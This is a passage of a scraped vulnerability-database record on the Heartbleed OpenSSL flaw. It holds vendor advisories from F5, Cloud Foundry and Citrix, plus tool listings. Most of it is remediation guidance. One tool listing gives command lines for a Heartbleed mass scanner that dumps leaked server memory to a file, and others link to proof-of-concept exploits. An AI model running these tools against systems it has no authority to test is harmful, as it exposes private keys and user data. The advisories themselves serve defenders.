\n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. 
F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. 
For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration utility](<https://support.f5.com/csp/article/K14620>)\n * [K14534: Creating SSL certificates and keys with OpenSSL (11.x - 14.x)](<https://support.f5.com/csp/article/K14534>)\n * [K13579: Generating new default certificate and key pairs for BIG-IP SSL profiles](<https://support.f5.com/csp/article/K13579>)\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * [K9114: Creating a new SSL device certificate and key pair](<https://support.f5.com/csp/article/K9114>)\n * [K7754: Renewing self-signed device certificates](<https://support.f5.com/csp/article/K7754>)\n\n**Important**: After you generate a new device certificate and private key pair, you must re-establish device trusts. Additionally, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you must recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a centralized management infrastructure (CMI) certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. 
To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group.\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * [K13649: Creating a device group using the Configuration utility (11.x - 12.x)](<https://support.f5.com/csp/article/K13649>)\n * [K13639: Configuring a device group using tmsh](<https://support.f5.com/csp/article/K13639>)\n * [K13946: Troubleshooting ConfigSync and device service clustering issues (11.x - 13.x)](<https://support.f5.com/csp/article/K13946>)\n\nThe big3d process\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. 
For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\nAffected big3d versions\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n * big3d version 11.5.0.1.0.227 for Linux \n * big3d version 11.5.1.0.0.110 for Linux\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to [K13703: Overview of big3d version management](<https://support.f5.com/csp/article/K13703>).\n\nBIG-IP maintenance and user passwords\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * [K13121: Changing system maintenance account passwords (11.x - 14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. 
For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from 
F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "edition": 1, "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "edition": 1, "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. 
For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. 
As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. 
\n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. 
However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. 
When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2020-03-11T02:54:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "CVE-2014-0160 Heartbleed\n\n# 
\n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * VMware GemFire Native Client 7.0.2.X\n * VMware Command Center 2.0.x, 2.1.x\n * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the -DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. 
The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "edition": 6, "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kitploit": [{"lastseen": "2020-02-25T04:38:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl 
wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "edition": 20, "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T04:43:38", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. 
\n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "edition": 18, "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-08T15:23:44", "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/--GJBN1j_Ojw/WFcdv3p9uVI/AAAAAAAAGsw/kk8HnTh5VRQ4CGEP7LCNnUddk63xt4fRQCLcB/s1600/sslscan.png>)\n\n \nThis is a fork of ioerror's version of sslscan (the original readme of which is included below). Changes are as follows: \n\n\n * Highlight SSLv2 and SSLv3 ciphers in output. \n * Highlight CBC ciphers on SSLv3 (POODLE). \n * Highlight 3DES and RC4 ciphers in output. \n * Highlight PFS+GCM ciphers as good in output. 
\n * Highlight NULL (0 bit), weak (<40 bit) and medium (40 < n <= 56) ciphers in output. \n * Highlight anonymous (ADH and AECDH) ciphers in output (purple). \n * Hide certificate information by default (display with ` --get-certificate ` ). \n * Hide rejected ciphers by default (display with ` --failed ` ). \n * Added TLSv1.1 and TLSv1.2 support (merged from twwbond/sslscan). \n * Compiles if OpenSSL does not support SSLv2 ciphers (merged from digineo/sslscan). \n * Supports IPv6 hostnames (can be forced with ` --ipv6 ` ). \n * Check for TLS compression (CRIME, disable with ` --no-compression ` ). \n * Disable cipher suite checking ` --no-ciphersuites ` . \n * Disable coloured output ` --no-colour ` . \n * Removed undocumented -p output option. \n * Added check for OpenSSL HeartBleed (CVE-2014-0160, disable with ` --no-heartbleed ` ). \n * Flag certificates signed with MD5 or SHA-1, or with short (<2048 bit) RSA keys. \n * Support scanning RDP servers with ` --rdp ` (credit skettler). \n * Added option to specify socket timeout. \n * Added option for static compilation (credit dmke). \n * Added ` --sleep ` option to pause between requests. \n * Disable output for anything than specified checks ` --no-preferred ` . \n * Determine the list of CAs acceptable for client certificates ` --show-client-cas ` . \n * Experimental build support on OSX (credit MikeSchroll). \n * Flag some self-signed SSL certificates. \n * Experimental Windows support (credit jtesta). \n * Display EC curve names and DHE key lengths with OpenSSL >= 1.0.2 ` --no-cipher-details ` . \n * Flag weak DHE keys with OpenSSL >= 1.0.2 ` --cipher-details ` . \n * Flag expired certificates. \n * Flag TLSv1.0 ciphers in output as weak. \n * Experimental OSX support (static building only). \n * Support for scanning PostgreSQL servers (credit nuxi). \n * Check for TLS Fallback SCSV support. \n * Added StartTLS support for LDAP ` --starttls-ldap ` . \n * Added SNI support ` --sni-name ` (credit Ken). 
\n \n** Building on Windows ** \nThanks to a patch by jtesta, sslscan can now be compiled on Windows. This can either be done natively or by cross-compiling from Linux. See INSTALL for instructions. \nNote that sslscan was originally written for Linux, and has not been extensively tested on Windows. As such, the Windows version should be considered experimental. \nPre-build cross-compiled Windows binaries are available on the [ GitHub Releases Page ](<https://github.com/rbsec/sslscan/releases>) . \n \n** Building on OS X ** \nThere is experimental support for statically building on OS X, however this should be considered unsupported. You may need to install any dependencies required to compile OpenSSL from source on OS X. Once you have, just run: \n\n \n \n make static\n\n \n** OpenSSL issues ** \n \n** Statically linking a custom OpenSSL build ** \nIt is possible to ignore the OpenSSL system installation and ship your own version. Although this results in a more resource-heavy ` sslscan ` binary (file size, memory consumption, etc.), this allows to enable both SSLv2 and SSLv3 ciphers. In comparison to the method of repackaging the Debian build, this custom OpenSSL build won't affect other tools on the same system, as they would use the version packaged by the distro's maintainers. \nTo compile your own OpenSSL version, you'll probably need to install the OpenSSL build dependencies: \n\n \n \n apt-get install build-essential git zlib1g-dev\n apt-get build-dep openssl\n\nthen run \n\n \n \n make static\n\nwhich will clone the [ OpenSSL repository ](<https://github.com/openssl/openssl>) , and configure/compile/test OpenSSL prior to compiling ` sslscan ` . \n** Please note: ** Out of the box, OpenSSL cannot compiled with ` clang ` without further customization (which is not done by the provided ` Makefile ` ). 
For more information on this, see [ Modifying Build Settings ](<https://wiki.openssl.org/index.php/Compilation_and_Installation#Modifying_Build_Settings>) in the OpenSSL wiki. \nYou can verify whether you have a statically linked OpenSSL version, if \n\n \n \n ./sslscan --version\n\nlooks a bit like \n\n \n \n 1.x.y-...-static\n OpenSSL 1.1.0-dev xx XXX xxxx\n\n(pay attention to the ` -static ` suffix and the ` 1.1.0-dev ` OpenSSL version). \n \n** Building on Kali ** \nKali now ships with a statically built version of sslscan which supports SSLv2. \nThe package can be found in the [ Kali Git Repository ](<http://git.kali.org/gitweb/?p=packages/sslscan.git;a=summary>) . \nIf for whatever reason you can't install this package, follow the instructions above for statically building against OpenSSL. \n \n** Building on Debian ** \nIt is recommended that you statically build sslscan using the instructions listed above. If this is not an option and you want to compile your system OpenSSL with support for legacy protocols such as SSLv2 and SSLv3 then follow the instructions below. \nNote that many modern distros (including Debian) ship with a version of OpenSSL that disables support for SSLv2 ciphers. If ` sslscan ` is compiled on one of these distros, it will not be able to detect SSLv2. \nThis issue can be resolved by rebuilding OpenSSL from source after removing the patch that disables SSLv2 support. \nThe ` build_openssl_debian.sh ` script automates this process for Debian systems. It has been tested on Debian Squeeze/Wheezy; it may work on other Debian based distros, but has not been tested. The built version of OpenSSL will be installed using ` dpkg ` . \nIf it is not possible to rebuild OpenSSL, ` sslscan ` will still compile (thanks to a patch from [ digineo/sslscan ](<https://github.com/digineo/sslscan>) , based on the debian patch). However, a warning will be displayed in the output to notify the user that SSLv2 ciphers will not be detected. 
\n \n \n\n\n** [ Download sslscan ](<https://github.com/rbsec/sslscan>) **\n", "edition": 28, "modified": "2016-12-26T14:30:12", "published": "2016-12-26T14:30:12", "id": "KITPLOIT:8661324951126484733", "href": "http://www.kitploit.com/2016/12/sslscan-tests-ssltls-enabled-services.html", "title": "sslscan - tests SSL/TLS enabled services to discover supported cipher suites", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "citrix": [{"lastseen": "2020-11-18T15:29:34", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160", "CVE-2015-0160"], "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<p> <a name=\"TopOfPage\"></a></p>\n<p> <span> <b>Overview</b></span></p>\n<p> <span>A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSSL server or client. </span></p>\n<p> <span>The issue has been assigned the following CVE identifier and is also known as the Heartbleed vulnerability:</span></p>\n<p> <span>CVE-2014-0160: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160</a></u></span></p>\n<p> <span> <b>What Citrix is Doing</b></span></p>\n<p> <span>Citrix has analyzed the impact of this issue on currently supported products. The following sections of this advisory provide impact information on each product.</span></p>\n<p> <span> <b>Products That Require Citrix Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 HDX RealTime Optimization Pack for Microsoft Lync 